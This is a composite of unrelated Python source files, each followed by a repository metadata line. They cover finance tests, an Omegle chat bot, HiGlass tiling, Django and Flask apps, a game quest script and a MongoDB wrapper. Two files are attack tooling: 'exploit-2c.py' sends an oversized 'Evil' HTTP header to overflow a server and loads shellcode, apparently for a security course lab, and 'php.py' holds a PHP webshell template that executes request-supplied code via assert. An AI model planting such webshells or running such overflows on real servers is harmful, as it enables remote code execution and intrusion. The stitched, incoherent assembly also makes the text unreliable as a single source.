class TestDataFrameWithCAGRCalculation(unittest.TestCase):
def test_simple_CAGR(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
res = dfl['static_one']
print (res)
assert res.loc[[datetime(2009, 1, 1)]][0] == 1
assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
def test_CAGR_ref_date_within_bounds(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
res = dfl['static_one']
assert res.loc[[datetime(2009, 1, 1)]][0] == 1
assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
def test_CAGR_ref_date_before_start(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
# equivalent to dfl['test_ref_date_before_start']
self.assertRaises(AssertionError, dfl.__getitem__, 'test_ref_date_before_start')
def test_CAGR_ref_date_after_end(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
# equivalent to dfl['test_ref_date_before_start']
self.assertRaises(AssertionError, dfl.__getitem__, 'test_ref_date_after_end')
def test_simple_CAGR_from_pandas(self):
times = pd.date_range('2009-01-01', '2009-04-01', freq='MS')
xls = pd.ExcelFile('test.xlsx')
df = xls.parse('Sheet1')
ldr = DataSeriesLoader.from_dataframe(df, times, size=2)
res = ldr['static_one']
assert res.loc[[datetime(2009, 1, 1)]][0] == 1
assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
def test_simple_CAGR_mm(self):
"""
Basic test case, applying CAGR to a Pandas Dataframe.
:return:
"""
# the time axis of our dataset
times = pd.date_range('2015-01-01', '2016-01-01', freq='MS')
# the sample axis our dataset
samples = 2
dfl = DataSeriesLoader.from_excel('test.xlsx', times, size=samples, sheet_index=0)
res = dfl['mm']
print(res)
# assert res.loc[[datetime(2009, 1, 1)]][0] == 1
# assert np.abs(res.loc[[datetime(2009, 4, 1)]][0] - pow(1.1, 3. / 12)) < 0.00001
if __name__ == '__main__':
unittest.main()
| dschien/PyExcelModelingHelper | tests/test_DataSeriesLoader.py | Python | mit | 3,547 | 0.003383 |
'''
View the coding live on Twitch @ https://www.twitch.tv/gmangavin and look at the github @ https://github.com/gmangavin/PyWeb
chromedriver for gui view, phantomjs for ghost view.
'''
import selenium.webdriver #Imports module
import time #Imports time
import threading #Imports threading, used to have multiple things happen at the same time.
import os #Imports OS
N = False #Used for the bool loop.
while N == False:
EngineChoice = input('Would you like a visual of the bot? (Y/N): ') #Part one for the web driver choice
YN = (EngineChoice.lower()) #Prevents capatalization error.
if YN == ('y'):
while N == False:
VarChoice = input('Would you like Firefox or Chrome? (F/C): ') #Part two for the web driver choice
FC = (VarChoice.lower()) #Prevents capatalization error.
if FC == ('f'):
try:
WebVar = selenium.webdriver.Firefox()
N = True
except selenium.common.exceptions.WebDriverException:
print("You don't seem to have the firefox webdriver installed. You can get it here https://github.com/mozilla/geckodriver/releases")
elif FC == ('c'):
try:
WebVar = selenium.webdriver.Chrome()
N = True
except:
print("You don't seem to have the chrome webdriver installed. You can get it here https://sites.google.com/a/chromium.org/chromedriver/downloads")
else:
print('Try again')
elif YN == ('n'):
try:
WebVar = selenium.webdriver.PhantomJS()
N = True
except selenium.common.exceptions.WebDriverException:
print("You don't seem to have the PhantomJS webdriver installed. You can get it here http://phantomjs.org/")
else:
print('Try again')
#A while loop to make sure the user enters in a correct character.
#Allows the user to choose which web driver they want to use.
Interest = input("What is a common interest you're looking for?: ")
WebVar.get('https://www.omegle.com')
print(WebVar.title)
WebVar.find_element_by_xpath('//*[@id="topicsettingscontainer"]/div/div[1]/span[2]').click() #Clicks the area for typing
Send = WebVar.find_element_by_class_name('newtopicinput') #Creates an input variable for text area.
Send.send_keys(Interest + ',') #Sends input to text area.
WebVar.find_element_by_xpath('//*[@id="textbtn"]').click() #Clicks the 'text' button
Disconnected = False
def Disconnect(*args):
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[2]/table/tbody/tr/td[1]/div/button').click()
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[2]/table/tbody/tr/td[1]/div/button').click()
global Disconnected
Disconnected = True
return Disconnected
def Change(*args):
if Disconnected == True:
os.system('cls')
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[1]/div[1]/div/div[4]/div/a').click()
Interest = input("What is a common interest you're looking for?: ")
Send2 = WebVar.find_element_by_class_name('topicplaceholder')
Send2.send_keys(Interest + ',') #Sends input to text area.
else:
print("You need to disconnect first")
def Connect(*args):
if Disconnected == True:
os.system('cls')
WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[2]/table/tbody/tr/td[1]/div/button').click()
os.system('cls')
print('Rebooting search.')
threading.Thread(target=StatusMode)._stop()
threading.Thread(target=UserMode)._stop()
time.sleep(1)
threading.Thread(target=StatusMode).start()
os.system('cls')
elif Disconnected == False:
print("You're still connected.")
else:
print("something is just broken")
def UserMode(*args):
while True:
UserM = input('') #Has the user type an interest.
if UserM == "/end":
Disconnect()
elif UserM == "/start":
Connect()
elif UserM == "/change":
Change()
else:
Sending = WebVar.find_element_by_class_name('chatmsg') #Takes the class used for user input.
Sending.send_keys(UserM)
WebVar.find_element_by_class_name('sendbtn').click()
def StatusMode(*args):
threading.Thread(target=UserMode).start() #Starts the operation in a thread.
StatusNew = None #Create a variable with no value.
while True:
Status = WebVar.find_element_by_xpath('/html/body/div[7]/div/div/div[1]/div[1]/div').text #Takes the text info from xpath
if StatusNew == (Status):
continue
else:
StatusNew = Status
if "Stranger has disconnected." not in Status:
os.system('cls') #Refreshes chat.
print(StatusNew)
print('')
else:
Disconnect()
threading.Thread(target=StatusMode).start() #Starts the operation in a thread. | gmangavin/PyMegle | Other Py/PyMegleTwo.py | Python | mit | 5,053 | 0.014843 |
import base64
import h5py
import math
import numpy as np
import os
import os.path as op
def array_to_hitile(
old_data, filename, zoom_step=8, chunks=(1e6,), agg_function=np.sum
):
"""
Downsample a dataset so that it's compatible with HiGlass (filetype: hitile, datatype: vector)
Parameters
----------
old_data: np.array
A numpy array containing the data to be downsampled
filename: string
The output filename where the resulting multi-resolution
data will be stored.
zoom_step: int
The number of zoom levels to skip when aggregating
"""
import dask.array as da
if op.exists(filename):
os.remove(filename)
f_new = h5py.File(filename, "w")
tile_size = 1024
max_pos = len(old_data)
# we store every n'th zoom level
zoom_factor = 2 ** zoom_step
max_zoom = math.ceil(math.log(max_pos / tile_size) / math.log(2))
meta = f_new.create_dataset("meta", (1,), dtype="f")
meta.attrs["tile-size"] = tile_size
meta.attrs["zoom-step"] = zoom_step
meta.attrs["max-length"] = max_pos
meta.attrs["max-zoom"] = max_zoom
meta.attrs["max-width"] = tile_size * 2 ** max_zoom
min_data = da.from_array(old_data, chunks)
max_data = da.from_array(old_data, chunks)
old_data = da.from_array(old_data, chunks)
for z in range(0, max_zoom, zoom_step):
values_dset = f_new.require_dataset(
"values_" + str(z), (len(old_data),), dtype="f", compression="gzip"
)
mins_dset = f_new.require_dataset(
"mins_" + str(z), (len(old_data),), dtype="f", compression="gzip"
)
maxs_dset = f_new.require_dataset(
"maxs_" + str(z), (len(old_data),), dtype="f", compression="gzip"
)
da.store(old_data, values_dset)
da.store(min_data, mins_dset)
da.store(max_data, maxs_dset)
# f_new['values_' + str(z)][:] = old_data
# see if we need to pad the end of the dataset
# if so, use the previous last value
if len(old_data) % zoom_factor != 0:
old_data = da.concatenate(
(old_data, [old_data[-1]] * (zoom_factor - len(old_data) % zoom_factor))
)
min_data = da.concatenate(
(min_data, [max_data[-1]] * (zoom_factor - len(min_data) % zoom_factor))
)
max_data = da.concatenate(
(max_data, [max_data[-1]] * (zoom_factor - len(max_data) % zoom_factor))
)
# aggregate the data by summing adjacent datapoints
# sys.stdout.write('summing...')
# sys.stdout.flush()
# print("fdsdsfs:", math.ceil(len(old_data) / zoom_factor), zoom_factor)
# print("chunks:", chunks, zoom_factor, 'len:', len(old_data))
old_data = old_data.rechunk(chunks)
min_data = old_data.rechunk(chunks)
max_data = old_data.rechunk(chunks)
# print('zoom_factor', zoom_factor, old_data.shape)
old_data = da.coarsen(agg_function, old_data, {0: zoom_factor})
min_data = da.coarsen(np.min, max_data, {0: zoom_factor})
max_data = da.coarsen(np.max, max_data, {0: zoom_factor})
# reshape( (math.ceil(len(old_data) / zoom_factor), zoom_factor)).sum(axis=1)
# sys.stdout.write(' done\n')
# sys.stdout.flush()
"""
if len(old_data) < 10000:
plt.plot(old_data)
"""
# plt.plot(old_data)
f_new.close()
def aggregate(a, num_to_agg):
if len(a) % num_to_agg != 0:
a = np.concatenate((a, [a[-1]] * (num_to_agg - len(a) % num_to_agg)))
return a.reshape((math.ceil(len(a) / num_to_agg), num_to_agg)).sum(axis=1)
def aggregate_min(a, num_to_agg):
if len(a) % num_to_agg != 0:
a = np.concatenate((a, [a[-1]] * (num_to_agg - len(a) % num_to_agg)))
return a.reshape((math.ceil(len(a) / num_to_agg), num_to_agg)).min(axis=1)
def aggregate_max(a, num_to_agg):
if len(a) % num_to_agg != 0:
a = np.concatenate((a, [a[-1]] * (num_to_agg - len(a) % num_to_agg)))
return a.reshape((math.ceil(len(a) / num_to_agg), num_to_agg)).max(axis=1)
def get_data(hdf_file, z, x):
"""
Return a tile from an hdf_file.
:param hdf_file: A file handle for an HDF5 file (h5py.File('...'))
:param z: The zoom level
:param x: The x position of the tile
"""
# is the title within the range of possible tiles
if x > 2 ** z:
print("OUT OF RIGHT RANGE")
return ([], [], [])
if x < 0:
print("OUT OF LEFT RANGE")
return ([], [], [])
d = hdf_file["meta"]
tile_size = int(d.attrs["tile-size"])
zoom_step = int(d.attrs["zoom-step"])
max_zoom = int(d.attrs["max-zoom"])
max_width = tile_size * 2 ** max_zoom
if "max-position" in d.attrs:
max_position = int(d.attrs["max-position"])
else:
max_position = max_width
rz = max_zoom - z
# tile_width = max_width / 2**z
# because we only store some a subsection of the zoom levels
next_stored_zoom = zoom_step * math.floor(rz / zoom_step)
zoom_offset = rz - next_stored_zoom
# the number of entries to aggregate for each new value
num_to_agg = 2 ** zoom_offset
total_in_length = tile_size * num_to_agg
# which positions we need to retrieve in order to dynamically aggregate
start_pos = int((x * 2 ** zoom_offset * tile_size))
end_pos = int(start_pos + total_in_length)
# print("max_position:", max_position)
max_position = int(max_position / 2 ** next_stored_zoom)
# print("new max_position:", max_position)
# print("start_pos:", start_pos)
# print("end_pos:", end_pos)
# print("next_stored_zoom", next_stored_zoom)
# print("max_position:", int(max_position))
f = hdf_file["values_" + str(int(next_stored_zoom))]
f_min = hdf_file["mins_" + str(int(next_stored_zoom))]
f_max = hdf_file["maxs_" + str(int(next_stored_zoom))]
if start_pos > max_position:
# we want a tile that's after the last bit of data
a = np.zeros(end_pos - start_pos)
a.fill(np.nan)
a_min = np.zeros(end_pos - start_pos)
a_min.fill(np.nan)
# umm, I don't think this needs to be here since
# everything should be nan
ret_array = aggregate(a, int(num_to_agg))
min_array = aggregate_min(a_min, int(num_to_agg))
# In the line below, "a_max" is undefined, so this would not work:
# max_array = aggregate_max(a_max, int(num_to_agg))
elif start_pos < max_position and max_position < end_pos:
a = f[start_pos:end_pos][:]
a[max_position + 1 : end_pos] = np.nan
a_min = f_min[start_pos:end_pos][:]
a_min[max_position + 1 : end_pos] = np.nan
a_max = f_max[start_pos:end_pos][:]
a_max[max_position + 1 : end_pos] = np.nan
ret_array = aggregate(a, int(num_to_agg))
min_array = aggregate_min(a_min, int(num_to_agg))
max_array = aggregate_max(a_max, int(num_to_agg))
else:
ret_array = aggregate(f[start_pos:end_pos], int(num_to_agg))
min_array = aggregate_min(f_min[start_pos:end_pos], int(num_to_agg))
max_array = aggregate_max(f_max[start_pos:end_pos], int(num_to_agg))
# print("ret_array:", f[start_pos:end_pos])
# print('ret_array:', ret_array)
# print('nansum', np.nansum(ret_array))
# check to see if we counted the number of NaN values in the given
# interval
f_nan = None
if "nan_values_" + str(int(next_stored_zoom)) in hdf_file:
f_nan = hdf_file["nan_values_" + str(int(next_stored_zoom))]
nan_array = aggregate(f_nan[start_pos:end_pos], int(num_to_agg))
num_aggregated = 2 ** (max_zoom - z)
num_vals_array = np.zeros(len(nan_array))
num_vals_array.fill(num_aggregated)
num_summed_array = num_vals_array - nan_array
averages_array = ret_array / num_summed_array
return (averages_array, min_array, max_array)
return (ret_array, min_array, max_array)
def tileset_info(hitile_path):
"""
Get the tileset info for a hitile file.
Parameters
----------
hitile_path: string
The path to the hitile file
Returns
-------
tileset_info: {'min_pos': [],
'max_pos': [],
'tile_size': 1024,
'max_zoom': 7
}
"""
hdf_file = h5py.File(hitile_path, "r")
d = hdf_file["meta"]
if "min-pos" in d.attrs:
min_pos = d.attrs["min-pos"]
else:
min_pos = 0
if "max-pos" in d.attrs:
max_pos = d.attrs["max-pos"]
else:
max_pos = d.attrs["max-length"]
return {
"max_pos": [int(max_pos)],
"min_pos": [int(min_pos)],
"max_width": 2 ** math.ceil(math.log(max_pos - min_pos) / math.log(2)),
"max_zoom": int(d.attrs["max-zoom"]),
"tile_size": int(d.attrs["tile-size"]),
}
def tiles(filepath, tile_ids):
"""
Generate tiles from a hitile file.
Parameters
----------
tileset: tilesets.models.Tileset object
The tileset that the tile ids should be retrieved from
tile_ids: [str,...]
A list of tile_ids (e.g. xyx.0.0) identifying the tiles
to be retrieved
Returns
-------
tile_list: [(tile_id, tile_data),...]
A list of tile_id, tile_data tuples
"""
generated_tiles = []
for tile_id in tile_ids:
tile_id_parts = tile_id.split(".")
tile_position = list(map(int, tile_id_parts[1:3]))
(dense, mins, maxs) = get_data(
h5py.File(filepath), tile_position[0], tile_position[1]
)
"""
if len(dense):
max_dense = max(dense)
min_dense = min(dense)
else:
max_dense = 0
min_dense = 0
has_nan = len([d for d in dense if np.isnan(d)]) > 0
if (
not has_nan and
max_dense > min_f16 and max_dense < max_f16 and
min_dense > min_f16 and min_dense < max_f16
):
tile_value = {
'dense': base64.b64encode(dense.astype('float16')).decode('utf-8'),
'mins': base64.b64encode(mins.astype('float16')).decode('utf-8'),
'maxs': base64.b64encode(mins.astype('float16')).decode('utf-8'),
'dtype': 'float16'
}
else:
"""
tile_value = {
"dense": base64.b64encode(dense.astype("float32")).decode("utf-8"),
"mins": base64.b64encode(mins.astype("float32")).decode("utf-8"),
"maxs": base64.b64encode(maxs.astype("float32")).decode("utf-8"),
"dtype": "float32",
}
generated_tiles += [(tile_id, tile_value)]
return generated_tiles
| hms-dbmi/clodius | clodius/tiles/hitile.py | Python | mit | 10,847 | 0.001106 |
# This code is so you can run the samples without installing the package
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
#
testinfo = "s, t 5, s, t 10.1, s, t 10.2, s, q"
tags = "spawn, Reverse"
import cocos
from cocos.director import director
from cocos.actions import Rotate, Reverse, MoveBy, Delay
import pyglet
from cocos.sprite import Sprite
class TestLayer(cocos.layer.Layer):
def __init__(self):
super( TestLayer, self ).__init__()
x,y = director.get_window_size()
self.sprite = Sprite( 'grossini.png', (x/2, y/2) )
self.add( self.sprite )
self.sprite2 = Sprite( 'grossini.png', (x/2, y/4) )
self.add( self.sprite2 )
seq = Rotate( 360, 10 ) | MoveBy((x/2,0))
self.sprite.do( seq )
self.sprite2.do( Reverse( seq ) )
def main():
director.init()
test_layer = TestLayer ()
main_scene = cocos.scene.Scene (test_layer)
director.run (main_scene)
if __name__ == '__main__':
main()
| eevee/cocos2d-mirror | test/test_spawn.py | Python | bsd-3-clause | 1,024 | 0.030273 |
import factory
from api import models
class ClientFactory(factory.DjangoModelFactory):
class Meta:
model = models.Client
name = 'Coaxis'
@factory.django.mute_signals(models.post_save)
class UserFactory(factory.DjangoModelFactory):
class Meta:
model = models.MyUser
email = factory.Sequence(lambda n: 'u{0}@coaxis.com'.format(n))
password = factory.PostGenerationMethodCall('set_password', 'password')
is_staff = False
class EmployeeFactory(factory.DjangoModelFactory):
class Meta:
model = models.Employee
user = factory.SubFactory(UserFactory)
is_technician = False
@factory.post_generation
def clients(self, create, extracted, **kwargs):
if not create: # Simple build, do nothing.
return
if extracted: # A list of objects were passed in, use them
for client in extracted:
self.clients.add(client)
class TechnicianFactory(EmployeeFactory):
is_technician = True
class DaemonFactory(factory.DjangoModelFactory):
class Meta:
model = models.Daemon
client = factory.SubFactory(ClientFactory)
| Coaxis-ASP/opt | backend/api/tests/factories.py | Python | gpl-3.0 | 1,150 | 0 |
import copy
from django.db.models.fields.related import ForeignKey, OneToOneField
from rest_framework import mixins
from rest_framework.generics import (
GenericAPIView, ListAPIView, ListCreateAPIView, RetrieveAPIView,
RetrieveUpdateDestroyAPIView
)
from api.generics.serializers import (
DynamicFieldsModelSerializer, DynamicFieldsSerializer
)
class DynamicView(GenericAPIView):
# foreign / one-to-one fields that can be used with select_related()
select_related_fields = []
serializer_fields = []
field_source_mapping = {}
fields = ()
selectable_fields = ()
def __init__(self, *args, **kwargs):
"""
Extract prefetches and default fields from Meta
"""
# TODO: move this to a meta class, to evaluate once when defining the
# class
# TODO: This is not efficient - 2016-01-20
serializer_class = self.get_serializer_class()
serializer = serializer_class() # need an instance to extract fields
model = serializer_class.Meta.model
assert issubclass(
serializer_class, DynamicFieldsModelSerializer
) or issubclass(serializer_class, DynamicFieldsSerializer), (
"serializer class must be an instance of \
DynamicFieldsModelSerializer " "instead got %s"
) % (serializer_class.__name__,)
self.serializer_fields = serializer.fields.keys()
self.select_related_fields = [
field.name for field in model._meta.fields
if isinstance(field, (ForeignKey, OneToOneField))
]
self.field_source_mapping = {
field.field_name: field.source
for field in serializer.fields.values()
if isinstance(
field, (ForeignKey, OneToOneField)
)
}
def _get_query_fields(self):
if not self.request:
return ()
request_fields = self.request.query_params.get('fields')
# if requested query fields is set to `all` we will return all
# serializer fields defined in serializer class. Here we assign
# `self.fields = ()` so that it will be assigned all serializer
# fields in `filter_queryset` method.
if request_fields and request_fields == 'all':
self.fields = ()
self.selectable_fields = (self.selectable_fields + tuple(
self.serializer_fields))
elif request_fields:
for request_field in request_fields.split(','):
if request_field not in list(self.fields):
# put selectable fields together with required fields
# defined in the class
self.fields = self.fields + (request_field,)
# just in case if you want to know which of fields
# we get as selectable field
self.selectable_fields = self.selectable_fields+(request_field,) # NOQA: E501
# Some bugs if request fields has 'aggregations'
# So we need to remove it from request fields.
# And assign a tuple fields without aggregations
fields = list(self.fields)
try:
fields.remove('aggregations')
except ValueError:
pass
# Assign it again
self.fields = tuple(fields)
return getattr(self, 'fields', ())
def filter_queryset(self, queryset, *args, **kwargs):
"""
Prefetches based on 'fields' GET arg
"""
filter_fields = copy.deepcopy(self.request.query_params)
if 'fields' in filter_fields:
filter_fields.pop('fields')
if 'format' in filter_fields:
filter_fields.pop('format')
if 'page' in filter_fields:
filter_fields.pop('page')
if 'page_size' in filter_fields:
filter_fields.pop('page_size')
if 'ordering' in filter_fields:
filter_fields.pop('ordering')
if 'q'in filter_fields:
filter_fields.pop('q')
if 'q_fields' in filter_fields:
filter_fields.pop('q_fields')
for filter_field in filter_fields:
found = False
try:
declared_filters = self.filter_class.declared_filters
for key in declared_filters:
if filter_field == key:
found = True
if found is False:
# make error in the code to fail
# if input wrong filter name.
setattr(self, 'filter_class', 'No Filter Class')
break
except AttributeError:
pass
fields = self._get_query_fields(*args, **kwargs)
if not fields:
fields = self.serializer_fields
select_related_fields = list(set(
self.select_related_fields
) & set(fields))
if select_related_fields:
queryset = queryset.select_related(*select_related_fields)
for field in fields:
# TODO: Hook this up in the view - 2016-01-15
if hasattr(queryset, 'prefetch_%s' % field):
queryset = getattr(queryset, 'prefetch_%s' % field)()
queryset = super(DynamicView, self).filter_queryset(
queryset, *args, **kwargs
)
return queryset
def get_serializer(self, *args, **kwargs):
"""
Apply 'fields' to dynamic fields serializer
"""
fields = self._get_query_fields()
kwargs['context'] = self.get_serializer_context()
return super(DynamicView, self).get_serializer(
fields=fields, *args, **kwargs
)
class DynamicListView(DynamicView, ListAPIView):
"""
List view with dynamic properties
"""
class DynamicDetailView(DynamicView, RetrieveAPIView):
"""
List view with dynamic properties
"""
class DynamicListCRUDView(DynamicView, ListCreateAPIView):
"""
List view with dynamic properties
"""
class DynamicDetailCRUDView(DynamicView, RetrieveUpdateDestroyAPIView):
"""
List view with dynamic properties
"""
class SaveAllSerializer(mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
mixins.CreateModelMixin,
GenericAPIView):
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def patch(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
| openaid-IATI/OIPA | OIPA/api/generics/views.py | Python | agpl-3.0 | 6,974 | 0.000143 |
#!/usr/bin/python
import sys
import socket
import traceback
import urllib
import struct
def build_exploit(shellcode):
req = "GET / HTTP/1.0\r\n" + \
"Evil: {evil}\r\n" + \
"Host: birk105.studby.uio.no:81\r\n\r\n"
# 536 is first address that causes the server to not return a valid response
req = req.replace("{evil}","".join(['a' for i in xrange(5000)]))
return req
def send_req(host, port, req):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to %s:%d..." % (host, port))
sock.connect((host, port))
print("Connected, sending request...")
sock.send(req)
print("Request sent, waiting for reply...")
rbuf = sock.recv(1024)
resp = ""
while len(rbuf):
resp = resp + rbuf
rbuf = sock.recv(1024)
print("Received reply.")
sock.close()
return resp
# execute request
if len(sys.argv) != 3:
print("Usage: " + sys.argv[0] + " host port")
exit()
try:
shellfile = open("shellcode.bin", "r")
shellcode = shellfile.read()
req = build_exploit(shellcode)
print("HTTP request:")
print(req)
resp = send_req(sys.argv[1], int(sys.argv[2]), req)
print("HTTP response:")
print(resp)
except:
print("Exception:")
print(traceback.format_exc())
| nmahlangu/cs263-project-one | exploit-2c.py | Python | mit | 1,279 | 0.016419 |
# Rewritten by RayzoR
import sys
from com.l2scoria.gameserver.model.quest import State
from com.l2scoria.gameserver.model.quest import QuestState
from com.l2scoria.gameserver.model.quest.jython import QuestJython as JQuest
qn = "269_InventionAmbition"
class Quest (JQuest) :
def __init__(self,id,name,descr):
JQuest.__init__(self,id,name,descr)
self.questItemIds = [10866]
def onEvent (self,event,st) :
htmltext = event
if event == "32486-03.htm" :
st.set("cond","1")
st.setState(STARTED)
st.playSound("ItemSound.quest_accept")
elif event == "32486-05.htm" :
st.exitQuest(1)
st.playSound("ItemSound.quest_finish")
return htmltext
def onTalk (self,npc,player):
htmltext = "<html><body>You are either not on a quest that involves this NPC, or you don't meet this NPC's minimum quest requirements.</body></html>"
st = player.getQuestState(qn)
if not st : return htmltext
npcId = npc.getNpcId()
id = st.getState()
EnergyOres = st.getQuestItemsCount(10866)
if id == CREATED :
if player.getLevel() < 18 :
htmltext = "32486-00.htm"
st.exitQuest(1)
else :
htmltext = "32486-01.htm"
elif EnergyOres > 0:
htmltext = "32486-07.htm"
bonus = 0
if EnergyOres >= 20:
bonus = 2044
st.giveItems(57,EnergyOres*50+bonus)
st.takeItems(10866,-1)
else :
htmltext = "32486-04.htm"
return htmltext
def onKill(self,npc,player,isPet):
st = player.getQuestState(qn)
if not st : return
if st.getState() != STARTED : return
if st.getRandom(10)<6 :
st.giveItems(10866,1)
st.playSound("ItemSound.quest_itemget")
return
QUEST = Quest(269,qn,"Invention Ambition")
CREATED = State('Start', QUEST)
STARTED = State('Started', QUEST)
COMPLETED = State('Completed', QUEST)
QUEST.setInitialState(CREATED)
QUEST.addStartNpc(32486)
QUEST.addTalkId(32486)
for mob in range(21124,21132) :
QUEST.addKillId(mob)
| zenn1989/scoria-interlude | L2Jscoria-Game/data/scripts/quests/269_InventionAmbition/__init__.py | Python | gpl-3.0 | 2,003 | 0.044433 |
#author: fyth
from webshell import *
class PhpShell(Webshell):
_password = 'cmd'
_content = "<?php var_dump(md5(123));@assert($_REQUEST['{0}']);?>"
_check_statement = 'var_dump(md5(123));'
_keyword = '202cb962ac59075b964b07152d234b70'
class PhpVerify(VerifyShell):
_content = "<?php var_dump(md5(123));unlink(__FILE__);?>"
_keyword = '202cb962ac59075b964b07152d234b70'
| jiangzhw/Beebeeto-framework | utils/payload/webshell/php.py | Python | gpl-2.0 | 400 | 0.005 |
from __future__ import absolute_import
import re, os, sys
from clay import app
import clay.config
from flask import make_response, request, redirect, render_template, url_for
from epubber.fimfic_epubgen import FimFictionEPubGenerator
site_epub_classes = [
FimFictionEPubGenerator
]
accesslog = clay.config.get_logger('epubber_access')
#####################################################################
# Main App Views Section
#####################################################################
@app.route('/', methods=['GET', 'POST'])
def main_view():
story = request.args.get("story") or None
if story:
data = None
for epgenclass in site_epub_classes:
epgen = epgenclass()
if epgen.handle_url(story):
epub_file, data = epgen.gen_epub()
accesslog.info('%(title)s - %(url)s' % epgen.metas)
del epgen
response = make_response(data)
response.headers["Content-Type"] = "application/epub+zip"
response.headers["Content-Disposition"] = "attachment; filename=%s" % epub_file
return response
del epgen
return ("Cannot generate epub for this URL.", 400)
return render_template("main.html")
#####################################################################
# Secondary Views Section
#####################################################################
@app.route('/health', methods=['GET'])
def health_view():
'''
Heartbeat view, because why not?
'''
return ('OK', 200)
#####################################################################
# URL Shortener Views Section
#####################################################################
@app.route('/img/<path>', methods=['GET', 'POST'])
def static_img_proxy_view(path):
'''
Make shorter URLs for image files.
'''
path = re.sub(r'[^A-Za-z0-9_.-]', r'_', path)
return redirect(url_for('static', filename=os.path.join('img', path)))
@app.route('/js/<path>', methods=['GET', 'POST'])
def static_js_proxy_view(path):
'''
Make shorter URLs for javascript files.
'''
path = re.sub(r'[^A-Za-z0-9_+.-]', r'_', path)
return redirect(url_for('static', filename=os.path.join('js', path)))
@app.route('/css/<path>', methods=['GET', 'POST'])
def static_css_proxy_view(path):
'''
Make shorter URLs for CSS files.
'''
path = re.sub(r'[^A-Za-z0-9_+.-]', r'_', path)
return redirect(url_for('static', filename=os.path.join('css', path)))
#####################################################################
# Main
#####################################################################
def main():
# Make templates copacetic with UTF8
reload(sys)
sys.setdefaultencoding('utf-8')
# App Config
app.secret_key = clay.config.get('flask.secret_key')
main()
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4 nowrap
| revarbat/epubber | epubber/views/main.py | Python | bsd-2-clause | 2,968 | 0.003706 |
from django.apps import AppConfig
class PatronsConfig(AppConfig):
name = 'patrons'
| PrayAndGrow/server | patrons/apps.py | Python | lgpl-3.0 | 89 | 0 |
import pymongo
from pymongo.objectid import ObjectId
import pymongo.cursor
class MongoWrapper:
def __init__ (self, cursor, model = None):
if model:
if not cursor['public']:
if not auth.user.id == cursor['owner']:
raise HTTP (401)
self.__dict__['cursor'] = cursor
self.__dict__['model'] = model
def __getattr__ (self, key):
try:
return getattr (self.cursor, key)
except AttributeError:
try:
val = self.cursor[unicode (key)]
if (type (val) == list) or (type (val) == dict):
return MongoWrapper (self.cursor[unicode (key)], self.model)
else:
return val
except KeyError:
return None
def __nonzero__ (self):
if self.cursor is None:
return False
return len (self.cursor) != 0
def __iter__ (self):
return MongoWrapperIter (self.cursor, self.model)
def public (self):
result = {}
result['id'] = str (self.cursor['_id'])
result['tags'] = self.cursor['tags']
for key in self.model.public ():
if self.cursor.has_key (key.name):
result[key.name] = self.cursor[key.name]
else:
result[key.name] = None
return result
def json (self):
return json.dumps (self.public ())
class MongoCursorWrapper:
def __init__ (self, cursor, model = None):
self.__cursor = cursor
self.model = model
def first (self):
if self.__cursor.count () > 0:
return self[0]
else:
return None
def __getattr__ (self, key):
return getattr (self.__cursor, key)
def __getitem__ (self, index):
record = self.__cursor[index]
if self.model:
if not record['public']:
if not auth.user.id == record['owner']:
raise HTTP (401)
return MongoWrapper (record, self.model)
def json (self):
result = []
for item in self:
result.append (item.public ())
return json.dumps (result)
def __len__ (self):
return self.__cursor.count ()
def __iter__ (self):
return MongoWrapperIter (self.__cursor, self.model)
class MongoWrapperIter:
def __init__ (self, cursor, model):
self.__cursor = iter (cursor)
self.model = model
def __iter__ (self):
return self
def next (self):
val = self.__cursor.next ()
if (type (val) == list) or (type (val) == dict):
return MongoWrapper (val, self.model)
else:
return val
class MongoCollectionWrapper:
def __init__ (self, name, model):
self.name = name
self.model = model
def authorized (self, record):
if not record['public']:
if not auth.user.id == record['owner']:
raise RuntimeError ()
def __getattr__ (self, key):
def action (*args, **kw):
data = getattr (mongo[self.name], key) (*args, **kw)
if type (data) == pymongo.cursor.Cursor:
return MongoCursorWrapper (data, self.model)
elif type (data) == dict:
return MongoWrapper (data, self.model)
else:
return data
return action
class DataManager:
def __init__ (self):
self.collections = {}
self.models = {}
def user (self):
user = mongo.users.find_one ({'user_id': auth.user.id})
if not user:
user = {'user_id': auth.user.id}
mongo.users.insert (user)
#print 'creating user'
return user
